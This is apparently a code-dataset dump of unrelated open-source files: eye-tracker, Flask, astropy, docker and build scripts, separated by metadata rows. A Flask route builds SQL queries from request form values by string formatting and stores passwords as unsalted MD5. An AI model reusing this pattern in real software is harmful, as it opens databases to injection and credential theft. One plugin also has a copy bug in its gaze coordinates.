pid=this_config.get('main', 'pid_filename'),
action=run_watch,
logger=loghandle
)
daemon.start()
sys.exit(0)
| bsd-2-clause | 5,773,901,483,905,628,000 | 37.867052 | 111 | 0.625074 | false | 4.369071 | true | false | false |
qvazzler/Flexget | tests/test_utils.py | 1 | 1326 | from __future__ import unicode_literals, division, absolute_import
from builtins import * # pylint: disable=unused-import, redefined-builtin
from datetime import datetime
from flexget.utils import json
class TestJson(object):
def test_json_encode_dt(self):
date_str = '2016-03-11T17:12:17Z'
dt = datetime.strptime(date_str, '%Y-%m-%dT%H:%M:%SZ')
encoded_dt = json.dumps(dt, encode_datetime=True)
assert encoded_dt == '"%s"' % date_str
def test_json_encode_dt_dict(self):
date_str = '2016-03-11T17:12:17Z'
dt = datetime.strptime(date_str, '%Y-%m-%dT%H:%M:%SZ')
date_obj = {'date': dt}
encoded_dt = json.dumps(date_obj, encode_datetime=True)
assert encoded_dt == '{"date": "%s"}' % date_str
def test_json_decode_dt(self):
date_str = '"2016-03-11T17:12:17Z"'
dt = datetime.strptime(date_str, '"%Y-%m-%dT%H:%M:%SZ"')
decoded_dt = json.loads(date_str, decode_datetime=True)
assert dt == decoded_dt
def test_json_decode_dt_obj(self):
date_str = '"2016-03-11T17:12:17Z"'
date_obj_str = '{"date": %s}' % date_str
decoded_dt = json.loads(date_obj_str, decode_datetime=True)
dt = datetime.strptime(date_str, '"%Y-%m-%dT%H:%M:%SZ"')
assert decoded_dt == {'date': dt}
| mit | 7,716,064,691,289,933,000 | 35.833333 | 74 | 0.602564 | false | 3.069444 | false | false | false |
infant-cognition-tampere/drop-eyetribe-plugin | drop_eyetribe/EyetrackerEyeTribe.py | 1 | 20648 | """TheEyeTribe plugin for drop."""
from drop.Sensor import Sensor
from threading import Thread
from Queue import Queue
import socket
from select import select
import json
import nudged
import glib
import os
import re
from datetime import datetime
import time
import csv
# Regular expression to match timestamp format given by eyetribe server.
# Compiled initially during import of module.
_timestamp_matcher = re.compile(
"^(?P<year>[0-9]{4})-(?P<month>[0-9]{2})-(?P<day>[0-9]{2}) "
"(?P<hour>[0-9]{2}):(?P<minute>[0-9]{2}):(?P<second>[0-9]{2})\."
"(?P<millisecond>[0-9]{3})$")
def _parse_timestamp(ts):
m = _timestamp_matcher.match(ts)
dt = datetime(year=int(m.group('year')),
month=int(m.group('month')),
day=int(m.group('day')),
hour=int(m.group('hour')),
minute=int(m.group('minute')),
second=int(m.group('second')),
microsecond=int(
m.group('millisecond')) * 1000)
return ((time.mktime(dt.timetuple()) * 1000) +
(dt.microsecond / 1000)) * 1000.0
def _get_validity_from_state(state):
if state & 0x1 and state & 0x2 and state & 0x4:
return 0
return -1
def _convert_gazedata_frame(frame):
# >LeftEyeNx
# >LeftEyeNy
# >LeftEyePosition3dRelativeX
# >LeftEyePosition3dRelativeY
# LeftEyePosition3dRelativeZ ?
# LeftEyePosition3dX
# LeftEyePosition3dY
# LeftEyePosition3dZ
# >LeftEyePupilDiameter
# >RightEyeNx
# >RightEyeNy
# >RightEyePosition3dRelativeX
# >RightEyePosition3dRelativeY
# RightEyePosition3dRelativeZ ?
# RightEyePosition3dX ?
# RightEyePosition3dY ?
# RightEyePosition3dZ ?
# >RightEyePupilDiameter
# >TETTime
# >ValidityLeftEye
# >ValidityRightEye
# >XGazePosLeftEye
# >XGazePosRightEye
# >YGazePosLeftEye
# >YGazePosRightEye
row = {'XGazePosLeftEye': frame['lefteye']['raw']['x'],
'YGazePosLeftEye': frame['lefteye']['raw']['y'],
'XGazePosRightEye': frame['righteye']['raw']['x'],
'YGazePosRightEye': frame['righteye']['raw']['y'],
'LeftEyeNx': frame['lefteye_nudged']['raw']['x'],
'LeftEyeNy': frame['lefteye_nudged']['raw']['y'],
'RightEyeNx': frame['righteye_nudged']['raw']['x'],
'RightEyeNy': frame['righteye_nudged']['raw']['y'],
'LeftEyePosition3dRelativeX':
1.0 - frame['lefteye']['pcenter']['x'],
'LeftEyePosition3dRelativeY':
frame['lefteye']['pcenter']['y'],
'RightEyePosition3dRelativeX':
1.0 - frame['righteye']['pcenter']['x'],
'RightEyePosition3dRelativeY':
frame['righteye']['pcenter']['y'],
'LeftEyePupilDiameter': frame['lefteye']['psize'],
'RightEyePupilDiameter': frame['righteye']['psize'],
'ValidityBothEyes':
_get_validity_from_state(frame['state']),
'TETTime':
_parse_timestamp(frame['timestamp'])}
return row
def _convert_json_to_tabdelim(source_filename, dest_filename):
"""Convert file from JSON to CSV format."""
with open(source_filename, 'r') as json_file:
json_lines = json_file.readlines()
json_objects = map(json.loads, json_lines)
json_frames = filter(lambda x: 'frame' in x, json_objects)
json_tags = filter(lambda x: 'tag' in x, json_objects)
frame_dicts = [_convert_gazedata_frame(f['frame']) for f in json_frames]
frame_keys = list(frozenset(reduce(
lambda x, y: x + y, [d.keys() for d in frame_dicts])))
tag_keys = list(frozenset(reduce(
lambda x, y: x + y, [t['tag'].keys() for t in json_tags])))
tag_keys = filter(lambda x: x != 'secondary_id', tag_keys)
# Generate list of start-end tags
# Assuming that start and end tags always follow each other and that
# there are even amount of tags
assert len(json_tags) % 2 == 0
tags = zip(*[iter([t['tag'] for t in json_tags])]*2)
# Modify frame dicts to contain tag information where present
for f in frame_dicts:
frame_time = f['TETTime'] / (1000 * 1000)
for t in tags:
assert t[0]['secondary_id'] == 'start' and \
t[1]['secondary_id'] == 'end'
start_time = t[0]['timestamp']
end_time = t[1]['timestamp']
if frame_time > start_time and frame_time < end_time:
tagdict = {k: str(v) for k, v in t[0].iteritems()}
tagdict.pop('secondary_id')
f.update(tagdict)
with open(dest_filename, 'w') as csv_file:
writer = csv.DictWriter(csv_file,
fieldnames=frame_keys + tag_keys,
dialect='excel-tab')
writer.writeheader()
writer.writerows(frame_dicts)
class EyeTribeSocket(Thread):
"""Thread for socket-based communication with EyeTribe server."""
def __init__(self, host="localhost", port=6555, callback=None):
"""Constructor."""
super(EyeTribeSocket, self).__init__()
# Handle messages with callback
self.callback = callback
# Create new non-blocking socket and connect
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.connect((host, port))
self.sock.setblocking(0)
self.send_queue = Queue()
def send(self, msg):
"""
Put a packet into send queue.
Thread main loop will process it in sending phase.
"""
# TODO MAYBE: Check message validity before sending
# Put message into send_queue
self.send_queue.put(msg)
def run(self):
"""Main loop of the socket thread."""
partial_data = ""
while self.should_run:
# Get stuff from send_queue and send
while not self.send_queue.empty():
msg = self.send_queue.get(False)
self.sock.send(msg)
self.send_queue.task_done()
# Select from sockets
# TODO: Somewhat hacky solution to use 0.01 timeout,
# examine the possibility to use "signals."
read_sockets, write_sockets, err_sockets = \
select([self.sock], [], [], 0.01)
for sock in read_sockets:
if sock == self.sock:
read_data = sock.recv(512)
if not read_data:
raise IOError
read_data = partial_data + read_data
msgs = read_data.split('\n')
for msg in msgs[:-1]:
# Do a callback for received messages
if self.callback is not None:
self.callback(msg)
partial_data = msgs[-1]
def start(self):
"""Start the socket thread."""
self.should_run = True
return super(EyeTribeSocket, self).start()
def stop(self):
"""Cause the socket loop to exit."""
self.should_run = False
class EyeTribe(object):
"""
Class for interfacing with EyeTribe tracker.
Mostly handles
serialization with The Eye Tribe server and encapsulates a socket
thread.
"""
get_value_keywords = [
'push',
'heartbeatinterval',
'version',
'trackerstate',
'framerate',
'iscalibrated',
'iscalibrating',
'screenindex',
'screenresw',
'screenresh',
'screenpsyw',
'screenpsyh'
]
valid_keywords = get_value_keywords + ['calibresult', 'frame']
def __init__(self, host, port, cb_frame=None):
"""Constructor."""
self.host = host
self.port = port
self.sockthread = None
self.cb_frame = cb_frame
self.values = {}
def _init_socket(self):
if self.sockthread is not None:
return
self.sockthread = EyeTribeSocket(self.host,
self.port,
self._msg_handler)
self.sockthread.start()
def _msg_handler(self, raw_msg):
# Decode msg
msg = json.loads(raw_msg)
# assert msg.get('statuscode') == 200
if msg.get('category') == 'tracker':
# Update internal value dict
self.values.update(msg.get('values', {}))
# If frame, do a frame callback
if 'frame' in msg.get('values', {}):
self.cb_frame(msg.get('values').get('frame'))
def _gen_request(self, category, request, values):
# TODO: Some parameter validity checking here
return {'category': category,
'request': request,
'values': values}
def _gen_set_values_msg(self, values):
v = dict()
v.update(values)
v.update({'version': 2})
return self._gen_request('tracker', 'set', v)
def _gen_get_values_msg(self, values):
return self._gen_request('tracker', 'get', values)
def _gen_set_push_msg(self, state):
return self._gen_set_values_msg({'push': state})
def _start_push(self):
"""Start push mode."""
self.sockthread.send(json.dumps(self._gen_set_push_msg(True)))
def _stop_push(self):
"""Stop push mode."""
# TODO: EyeTribe server does not stop sending data after stop push
# request.
self.sockthread.send(json.dumps(self._gen_set_push_msg(False)))
def start(self):
"""Start the Eye Tribe."""
self._init_socket()
# First request all relevant values from eyetribe server
self.sockthread.send(json.dumps(self._gen_get_values_msg(
self.get_value_keywords)))
# Then start push mode
self._start_push()
def stop(self):
"""Stop the Eye Tribe."""
self._stop_push()
self.sockthread.stop()
del self.sockthread
self.sockthread = None
class EyeTribeET(Sensor):
"""Plugin class for drop."""
def __init__(self, rootdir, savedir, on_created, on_error):
"""Constructor."""
# run the superclass constructor
super(EyeTribeET, self).__init__()
self.type = 'Eyetracker'
self.control_elements = []
self.device_id = "Eyetribe eyetracker"
self.on_created = on_created
self.on_error = on_error
self.tracker = EyeTribe("localhost", 6555, self._handle_frame_callback)
self.tracker.start()
# nudged calibration values
self.nudged_current_range = None
self.nudged_domain_r = []
self.nudged_domain_l = []
self.nudged_range = []
self.nudged_transform_r = nudged.Transform(1, 0, 0, 0)
self.nudged_transform_l = nudged.Transform(1, 0, 0, 0)
self.collect_data = False
glib.idle_add(self.on_created, self)
def _handle_frame_callback(self, frame):
glib.idle_add(self._handle_gazedata_frame, frame)
def _inside_aoi(self, x, y, aoi):
return aoi[0] < x and x < aoi[1] and aoi[2] < y and y < aoi[3]
def _data_condition_check(self, rx, ry, lx, ly):
# TODO: Move this function to superclass
"""
Data condition check.
Returns True if the condition met, False if not.
"""
for cond in self.data_conditions:
if cond["type"] == "aoi":
if cond["inorout"] == "in" and \
(self._inside_aoi(rx, ry, cond["aoi"]) or
self._inside_aoi(lx, ly, cond["aoi"])):
self.data_conditions = []
return True
return False
def _handle_gazedata_frame(self, frame):
# TODO: Create a superclass version of this
# Parsing
screen_w = self.tracker.values['screenresw']
screen_h = self.tracker.values['screenresh']
gaze_left_x = frame['lefteye']['raw']['x'] / screen_w
gaze_left_y = frame['lefteye']['raw']['y'] / screen_h
gaze_right_x = frame['righteye']['raw']['x'] / screen_w
gaze_right_y = frame['righteye']['raw']['y'] / screen_h
# Put normalized coordinates back into frame
frame['lefteye']['raw']['x'] = gaze_left_x
frame['lefteye']['raw']['y'] = gaze_left_x
frame['righteye']['raw']['x'] = gaze_right_x
frame['righteye']['raw']['y'] = gaze_right_y
# TODO: Do normalization and transforms for avg coordinates as well
# Nudged transform
gaze_left_nx, gaze_left_ny = \
self.nudged_transform_l.transform([gaze_left_x, gaze_left_y])
gaze_right_nx, gaze_right_ny = \
self.nudged_transform_r.transform([gaze_right_x, gaze_right_y])
# Write data to file if recording has started
frame.update({
'lefteye_nudged': {'raw': {'x': gaze_left_x, 'y': gaze_left_y}},
'righteye_nudged': {'raw': {'x': gaze_right_x, 'y': gaze_right_y}}
})
if self.collect_data:
self.collect_file.write(json.dumps({'frame': frame}) + '\n')
# Calibration & linear transformation section
if self.nudged_current_range is not None:
# If tracking both gaze and eyes (as a validity check)
if frame['state'] & 0x3 != 0:
self.nudged_range.append(self.nudged_current_range)
self.nudged_domain_l.append([gaze_left_x, gaze_left_y])
self.nudged_domain_r.append([gaze_right_x, gaze_right_y])
# Data condition check
dc_nudged = self._data_condition_check(gaze_right_nx,
gaze_right_ny,
gaze_left_nx,
gaze_left_ny)
dc_uncalibrated = self._data_condition_check(gaze_right_x,
gaze_right_y,
gaze_left_x,
gaze_left_y)
if dc_nudged or dc_uncalibrated:
self.emit("draw_que_updated")
self.emit("data_condition_met")
# Draw eyes and gaze positions
for eye in ['left', 'right']:
self.draw_eye(eye, frame[eye + 'eye'], 1.0)
self.draw_gaze('left', gaze_left_x, gaze_left_y, 1.0)
self.draw_gaze('right', gaze_right_x, gaze_right_y, 1.0)
self.draw_gaze('leftN', gaze_left_nx, gaze_left_ny, 1.0,
{'r': 1, 'g': 1, 'b': 1})
self.draw_gaze('rightN', gaze_right_nx, gaze_right_ny, 1.0,
{'r': 1, 'g': 1, 'b': 1})
def trial_started(self, tn, tc):
"""Called when trial has started."""
return False
def trial_completed(self, name, tn, tc, misc):
"""Called when trial has completed."""
return False
def tag(self, tag):
"""Called when tag needs to be inserted into data."""
if self.collect_data:
self.collect_file.write(json.dumps({'tag': tag}) + '\n')
# check if validity is to be calculated
if tag["secondary_id"] == "start":
# go to nudged calibration mode
if "nudged_point" in tag:
# Nudged point format: "1.0, 0.5"
[x, y] = tag["nudged_point"].split(",")
xf = float(x)
yf = float(y)
self.nudged_current_range = [xf, yf]
# check if previous occurrances of this point exist
while [xf, yf] in self.nudged_range:
# find the index of the element in range
ind = self.nudged_range.index([xf, yf])
# remove the index from range and domains
self.nudged_range.pop(ind)
self.nudged_domain_l.pop(ind)
self.nudged_domain_r.pop(ind)
elif tag["secondary_id"] == "end":
if "nudged_point" in tag:
self.nudged_current_range = None
# calculate nudged transform
print "Calculating nudged calibration for right eye with " + \
"vectors: dom[" + str(len(self.nudged_domain_r)) + \
"] and range[" + str(len(self.nudged_range))
self.nudged_transform_r = nudged.estimate(self.nudged_domain_r,
self.nudged_range)
print "Calculating new calibration..."
self.nudged_transform_l = nudged.estimate(self.nudged_domain_l,
self.nudged_range)
return False
def action(self, action_id):
"""Perform actions for the control elements defined."""
print "ET: ACTION"
return False
def get_type(self):
"""Get 'type' of eye tracker."""
return self.type
def add_data_condition(self, condition):
"""Add data condition."""
print "ET: ADD DATA CONDITION"
return False
def get_device_id(self):
"""Get id of the device."""
return self.device_id
def get_control_elements(self):
"""Get control elements."""
return self.control_elements
def stop_recording(self):
"""Called when recording should be stopped."""
if self.collect_data:
self.collect_data = False
self.collect_file.close()
_convert_json_to_tabdelim(self.collect_filename + '.json',
self.collect_filename)
def start_recording(self, rootdir, participant_id, experiment_file,
section_id):
"""Called when recording should be started."""
assert not self.collect_data
expname = os.path.basename(experiment_file).split('.')[0]
fname = '%s_%s_%s.gazedata' % (expname,
participant_id,
section_id)
fname = os.path.join(rootdir, fname)
json_fname = fname + '.json'
self.collect_file = open(json_fname, 'w')
self.collect_filename = fname
metadata = json.dumps({'metadata': self.tracker.values})
self.collect_file.write(metadata + '\n')
self.collect_data = True
def disconnect(self):
"""Called when disconnect has been requested from GUI."""
self.tracker.stop()
self.emit("clear_screen")
self.remove_all_listeners()
return False
def draw_gaze(self, eye, gazepos_x, gazepos_y, opacity,
color={'r': 0, 'g': 0, 'b': 1}):
"""Draw one gazepoint."""
radius = 0.02
self.emit("add_draw_que",
eye,
{"type": "circle",
"r": color['r'],
"g": color['g'],
"b": color['b'],
"o": opacity,
"x": gazepos_x,
"y": gazepos_y,
"radius": radius})
def draw_eye(self, eye, frame_eye, opacity):
"""Draw one eye."""
camera_pos_x = 1.0 - frame_eye['pcenter']['x']
camera_pos_y = frame_eye['pcenter']['y']
screen_w = self.tracker.values['screenresw']
screen_h = self.tracker.values['screenresh']
gazepos_x = frame_eye['raw']['x'] / screen_w
gazepos_y = frame_eye['raw']['y'] / screen_h
point_x = gazepos_x - .5
point_y = gazepos_y - .5
ball_radius = 0.075
iris_radius = 0.03
pupil_radius = 0.01
x = 1 - camera_pos_x
y = camera_pos_y
self.emit("add_draw_que", eye + "ball",
{"type": "circle", "r": 1, "g": 1, "b": 1,
"o": opacity, "x": x, "y": y, "radius": ball_radius})
x = 1 - camera_pos_x + ((ball_radius - iris_radius / 2) * point_x)
y = camera_pos_y + ((ball_radius - iris_radius / 2) * point_y)
self.emit("add_draw_que", eye + "iris",
{"type": "circle", "r": 0.5, "g": 0.5, "b": 1,
"o": opacity, "x": x, "y": y, "radius": iris_radius})
self.emit("add_draw_que", eye + "pupil",
{"type": "circle", "r": 0, "g": 0, "b": 0,
"o": opacity, "x": x, "y": y, "radius": pupil_radius})
def __del__(self):
"""Destructor."""
print self.device_id + " disconnected."
| mit | 9,056,282,555,783,877,000 | 33.18543 | 79 | 0.531916 | false | 3.670103 | false | false | false |
MissRoven/python | demo/app/mangeruser.py | 1 | 1063 | from . import app
import json
from flask import request,render_template,redirect,make_response,session
@app.route('/upuser')
def adduser():
return render_template('up.html',username=session['username'])
@app.route('/changeuser',methods=['POST'])
def changeuser():
change = request.form.get('change')
username =request.form.get('username')
if "show" == change:
sql = 'select * from user where username = "%s"'%(username)
tmp = app.config['cursor']._execute(sql)
cur=tmp['cur'].fetchall()
return json.dumps(cur)
elif "update" == change:
password =request.form.get('password')
email =request.form.get('email')
age =request.form.get('age')
sex =request.form.get('sex')
address =request.form.get('address')
sql = 'update user set password=md5("%s"),email="%s",age="%s",sex="%s",address="%s" where username="%s" '%(password,email,age,sex,address,username)
print sql
tmp = app.config['cursor']._execute(sql)
cur=tmp['msg']
return cur
| gpl-2.0 | -9,161,075,792,723,971,000 | 36.964286 | 155 | 0.621825 | false | 3.640411 | false | false | false |
crawfordsm/indlulamithi | setup.py | 1 | 3745 | #!/usr/bin/env python
# Licensed under a 3-clause BSD style license - see LICENSE.rst
import glob
import os
import sys
import ah_bootstrap
from setuptools import setup
#A dirty hack to get around some early import/configurations ambiguities
if sys.version_info[0] >= 3:
import builtins
else:
import __builtin__ as builtins
builtins._ASTROPY_SETUP_ = True
from astropy_helpers.setup_helpers import (
register_commands, adjust_compiler, get_debug_option, get_package_info)
from astropy_helpers.git_helpers import get_git_devstr
from astropy_helpers.version_helpers import generate_version_py
# Get some values from the setup.cfg
from distutils import config
conf = config.ConfigParser()
conf.read(['setup.cfg'])
metadata = dict(conf.items('metadata'))
PACKAGENAME = metadata.get('package_name', 'packagename')
DESCRIPTION = metadata.get('description', 'Astropy affiliated package')
AUTHOR = metadata.get('author', '')
AUTHOR_EMAIL = metadata.get('author_email', '')
LICENSE = metadata.get('license', 'unknown')
URL = metadata.get('url', 'http://astropy.org')
# Get the long description from the package's docstring
__import__(PACKAGENAME)
package = sys.modules[PACKAGENAME]
LONG_DESCRIPTION = package.__doc__
# Store the package name in a built-in variable so it's easy
# to get from other parts of the setup infrastructure
builtins._ASTROPY_PACKAGE_NAME_ = PACKAGENAME
# VERSION should be PEP386 compatible (http://www.python.org/dev/peps/pep-0386)
VERSION = '0.1.dev'
# Indicates if this version is a release version
RELEASE = 'dev' not in VERSION
if not RELEASE:
VERSION += get_git_devstr(False)
# Populate the dict of setup command overrides; this should be done before
# invoking any other functionality from distutils since it can potentially
# modify distutils' behavior.
cmdclassd = register_commands(PACKAGENAME, VERSION, RELEASE)
# Adjust the compiler in case the default on this platform is to use a
# broken one.
adjust_compiler(PACKAGENAME)
# Freeze build information in version.py
generate_version_py(PACKAGENAME, VERSION, RELEASE,
get_debug_option(PACKAGENAME))
# Treat everything in scripts except README.rst as a script to be installed
scripts = [fname for fname in glob.glob(os.path.join('scripts', '*'))
if os.path.basename(fname) != 'README.rst']
# Get configuration information from all of the various subpackages.
# See the docstring for setup_helpers.update_package_files for more
# details.
package_info = get_package_info()
# Add the project-global data
package_info['package_data'].setdefault(PACKAGENAME, [])
package_info['package_data'][PACKAGENAME].append('data/*')
# Define entry points for command-line scripts
entry_points = {}
entry_points['console_scripts'] = [
'astropy-package-template-example = packagename.example_mod:main',
]
# Include all .c files, recursively, including those generated by
# Cython, since we can not do this in MANIFEST.in with a "dynamic"
# directory name.
c_files = []
for root, dirs, files in os.walk(PACKAGENAME):
for filename in files:
if filename.endswith('.c'):
c_files.append(
os.path.join(
os.path.relpath(root, PACKAGENAME), filename))
package_info['package_data'][PACKAGENAME].extend(c_files)
setup(name=PACKAGENAME,
version=VERSION,
description=DESCRIPTION,
scripts=scripts,
requires=['astropy'],
install_requires=['astropy'],
provides=[PACKAGENAME],
author=AUTHOR,
author_email=AUTHOR_EMAIL,
license=LICENSE,
url=URL,
long_description=LONG_DESCRIPTION,
cmdclass=cmdclassd,
zip_safe=False,
use_2to3=True,
entry_points=entry_points,
**package_info
)
| bsd-3-clause | 1,335,141,643,837,184,800 | 31.284483 | 79 | 0.722296 | false | 3.667973 | false | false | false |
nfqsolutions/pylm-registry | pylm/registry/clients/logs.py | 1 | 1616 | import json
from urllib import parse
from tornado.httpclient import HTTPClient
class LogClient(object):
"""
Client to send and retrieve logs
"""
def __init__(self, uri, cluster):
self.uri = uri
self.cluster = cluster
def send(self, text):
"""
Send a log line to the registry
:param text: Text of the log line
"""
arguments = {
'cluster': self.cluster,
}
client = HTTPClient()
client.fetch('{}/logs?{}'.format(
self.uri, parse.urlencode(arguments)),
method='POST',
body=text
)
def download(self, fr=None, to=None):
"""
Download the log lines, that you may filter by time
:param fr: datetime. Log lines from
:param to: datetime. Log lines to
:return: A list with dicts
"""
arguments = {
'cluster': self.cluster
}
if fr:
arguments['fr'] = fr
if to:
arguments['to'] = to
client = HTTPClient()
response = client.fetch('{}/logs?{}'.format(
self.uri, parse.urlencode(arguments)),
)
return json.loads(response.body.decode('utf-8'))
def view(self, fr=None, to=None):
"""
Pretty print the log lines
:param fr: datetime. Log lines from
:param to: datetime. Log lines to
:return:
"""
for log_line in self.download(fr, to):
print(log_line['when'], log_line['text'])
def delete(self):
raise NotImplementedError() | agpl-3.0 | 1,886,138,002,118,353,000 | 22.779412 | 59 | 0.525371 | false | 4.367568 | false | false | false |
BeyondTheClouds/enoslib | enoslib/docker.py | 1 | 5041 | """Manage remote docker containers as first class citizens.
A possible workflow would be to start your containers using the method of
your choice and build the list of available dockers using the
:py:func:`enoslib.docker.get_dockers` function.
A ``DockerHost`` is a specialization of a ``Host`` and thus can be fed into
any Host related operations (play_on, run_command...) [#docker0]_. Hosts
datastructure in enoslib are tied somehow to Ansible. DockerHost is shaped so
that the docker connection plugin can run. So we inject at build time the
necessary connection options (``ansible_connection=docker``,
``ansible_docker_extra_args="-H <remote_docker>"``).
Connections to remote docker daemons can be made using different
protocols [#docker1]_.
- Using ssh: requires ssh access to remote host but
can go through a bastion host if .ssh/config is configured correctly.
Note that the docker client must be available.
- Using raw tcp: requires to reach the remote docker daemon (e.g be inside
g5k). Note that in this case the remote socket must be exposed.
Additionaly the structure is compatible with mitogen and its delegation model
[#docker2]_ which can improve the performance. Note that the facts from the
host machines (where the docker daemon runs) needs to be gathered. One way to
ensure this is to explictly gather the facts from such hosts.
.. topic:: Links
.. [#docker0] https://en.wikipedia.org/wiki/Liskov_substitution_principle
.. [#docker1] https://docs.docker.com/engine/reference/commandline/dockerd
.. [#docker2] https://mitogen.networkgenomics.com/ansible_detailed.html
Example:
.. literalinclude:: examples/advanced_docker.py
:language: python
:linenos:
"""
import json
from typing import List, Mapping, Optional
from enoslib.api import run_command, get_hosts
from enoslib.objects import Host, Roles
class DockerHost(Host):
"""A kind of host reachable using docker protocol.
Args:
alias: **unique** name accross the deployment
name : name of the docker container on the remote hosts
host : the host where the container can be found
proto: how to connect to the remote host
(DockerHost.PROTO_TCP/DockerHost.PROTO_SSH)
[Default DockerHost.PROTO_SSH]
state: dict representing the state as returned by ``docker inspect``
"""
PROTO_SSH = "ssh"
PROTO_TCP = "tcp"
def __init__(
self,
alias: str,
container_name: str,
host: Host,
proto: Optional[str] = None,
state: Optional[Mapping] = None,
):
self.remote = host.address
if proto is None:
proto = self.PROTO_SSH
self.proto = proto
if self.proto not in [self.PROTO_SSH, self.PROTO_TCP]:
raise ValueError(f"proto must be in {[self.PROTO_SSH, self.PROTO_TCP]}")
if host.user:
self.remote = f"{host.user}@{host.address}"
else:
self.remote = f"{host.address}"
# Optionaly keep the internal state (return by docker inspect)
# Note that currently we don't provide, any consistency guarantee.
self._state = {} if state is None else state
super().__init__(
container_name,
alias=alias,
user=host.user,
keyfile=host.keyfile,
extra=dict(
ansible_connection="docker",
ansible_docker_extra_args=f"-H {proto}://{self.remote}",
mitogen_via=f"{host.user}@{host.address}",
),
)
@classmethod
def from_state(cls, state: Mapping, host: Host):
"""Build a DockerHost from a state json as returned by docker inspect."""
container_name = state["Name"]
alias = f"{container_name}-{host.alias}"
return cls(alias, container_name, host, state=state)
def get_dockers(
roles: Roles, pattern_hosts: str = "*", container_name: str = ".*"
) -> List[DockerHost]:
"""Get remote dockers hosts.
Args:
roles: the roles as returned by
:py:meth:`enoslib.infra.provider.Provider.init`
pattern_hosts: pattern to describe ansible hosts to target.
see https://docs.ansible.com/ansible/latest/intro_patterns.html
container_name: name of the containers to look for. Regexp are
supported as in filter option of docker inpect.
Returns:
List of DockerHost matching the passed container_name
"""
docker_hosts = []
result = run_command(
f"docker ps -q --filter name={container_name} | xargs docker inspect",
pattern_hosts=pattern_hosts,
roles=roles,
on_error_continue=True,
)
# parsing the results
for alias, r in result["ok"].items():
dockers = json.loads(r["stdout"])
host = get_hosts(roles, alias)[0]
for docker in dockers:
docker_host = DockerHost.from_state(docker, host)
docker_hosts.append(docker_host)
return docker_hosts | gpl-3.0 | -5,821,203,870,560,577,000 | 36.073529 | 84 | 0.652252 | false | 4.026358 | false | false | false |
mikel-egana-aranguren/SADI-Galaxy-Docker | galaxy-dist/scripts/scramble/scripts/DRMAA_python-macosx.py | 1 | 1552 | import os, sys, shutil
if "SGE_ROOT" not in os.environ:
print "main(): Please set SGE_ROOT to the path of your SGE installation"
print "main(): before scrambling DRMAA_python"
sys.exit(1)
# change back to the build dir
if os.path.dirname( sys.argv[0] ) != "":
os.chdir( os.path.dirname( sys.argv[0] ) )
# find setuptools
sys.path.append( os.path.join( '..', '..', '..', 'lib' ) )
from scramble_lib import *
tag = get_tag() # get the tag
clean() # clean up any existing stuff (could happen if you run scramble.py by hand)
# patch
file = "setup.py"
print "main(): Patching", file
if not os.access( "%s.orig" %file, os.F_OK ):
shutil.copyfile( file, "%s.orig" %file )
i = open( "%s.orig" %file, "r" )
o = open( file, "w" )
for line in i.readlines():
if line == 'SGE6_ROOT="/scratch_test02/SGE6"\n':
line = 'SGE6_ROOT="%s"\n' % os.environ["SGE_ROOT"]
if line.startswith('link_args ='):
line = 'link_args = [ "-L%s" % os.path.join(SGE6_ROOT, "lib", SGE6_ARCH), "-ldrmaa" ]\n'
print >>o, line,
i.close()
o.close()
# build
me = sys.argv[0]
sys.argv = [ me ]
sys.argv.append( "build" )
execfile( "setup.py", globals(), locals() )
# fix _cDRMAA.so rpath
so = "build/lib.%s-%s/_cDRMAA.so" % ( pkg_resources.get_platform(), sys.version[:3] )
libdrmaa = os.path.join(SGE6_ROOT, "lib", SGE6_ARCH, "libdrmaa.dylib.1.0" )
os.system( "install_name_tool -change libdrmaa.dylib.1.0 %s %s" % ( libdrmaa, so ) )
# package
sys.argv = [ me ]
sys.argv.append( "bdist_egg" )
execfile( "setup.py", globals(), locals() )
| gpl-3.0 | -6,921,328,556,642,751,000 | 30.673469 | 97 | 0.619201 | false | 2.561056 | false | false | false |
demarlik01/szcal | app.py | 1 | 1040 | from flask import Flask
from flask import request
from flask import jsonify
from flask import Response
from flask_cors import CORS
from database import session
from models import Address
from urllib import parse
from utils import replace_if_short_address
app = Flask(__name__)
CORS(app)
@app.route('/cj/secluded_place')
def cj_secluded_place():
address_args = request.args.get('address')
if address_args:
trimmed_address = parse.unquote(address_args).replace(' ', '')
address = replace_if_short_address(trimmed_address)
result = session.query(Address).filter(Address.trimmed_address == address).first()
if result is not None:
result_dict = {
'zipcode': result.zipcode,
'address': result.address,
'additional_fee': result.add_fee,
}
return jsonify(result_dict)
else:
return Response(status=404)
else:
return Response(status=400)
if __name__ == '__main__':
app.run(debug=True)
| mit | -1,199,521,550,846,967,300 | 27.888889 | 90 | 0.638462 | false | 4 | false | false | false |
annahs/atmos_research | LEO_2D_histos_from_db.py | 1 | 3992 | import sys
import os
import datetime
import pickle
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import matplotlib.colors as colors
from pprint import pprint
import sqlite3
import calendar
from datetime import datetime
#id INTEGER PRIMARY KEY AUTOINCREMENT,
#sp2b_file TEXT,
#file_index INT,
#instr TEXT,
#instr_locn TEXT,
#particle_type TEXT,
#particle_dia FLOAT,
#unix_ts_utc FLOAT,
#actual_scat_amp FLOAT,
#actual_peak_pos INT,
#FF_scat_amp FLOAT,
#FF_peak_pos INT,
#FF_gauss_width FLOAT,
#zeroX_to_peak FLOAT,
#LF_scat_amp FLOAT,
#incand_amp FLOAT,
#lag_time_fit_to_incand FLOAT,
#LF_baseline_pct_diff FLOAT,
#rBC_mass_fg FLOAT,
#coat_thickness_nm FLOAT,
#zero_crossing_posn FLOAT,
#UNIQUE (sp2b_file, file_index, instr)
#connect to database
conn = sqlite3.connect('C:/projects/dbs/SP2_data.db')
c = conn.cursor()
instrument = 'UBCSP2'
instrument_locn = 'WHI'
type_particle = 'incand'
start_date = datetime.strptime('20120401','%Y%m%d')
end_date = datetime.strptime('20120531','%Y%m%d')
lookup_file = 'C:/Users/Sarah Hanna/Documents/Data/WHI long term record/coatings/lookup_tables/coating_lookup_table_WHI_2012_UBCSP2.lupckl'
rBC_density = 1.8
incand_sat = 3750
LF_max = 45000 #above this is unreasonable
lookup = open(lookup_file, 'r')
lookup_table = pickle.load(lookup)
lookup.close()
min_rBC_mass = 1.63#120 2.6-#140 3.86-#160nm 0.25
max_rBC_mass = 2.6#140 3.86-160 5.5-#180nm 10.05
VED_min = 65
VED_max = 220
scat_lim = 100
begin_data = calendar.timegm(start_date.timetuple())
end_data = calendar.timegm(end_date.timetuple())
data = []
particles=0
no_scat=0
no_scat_110 =0
fit_failure=0
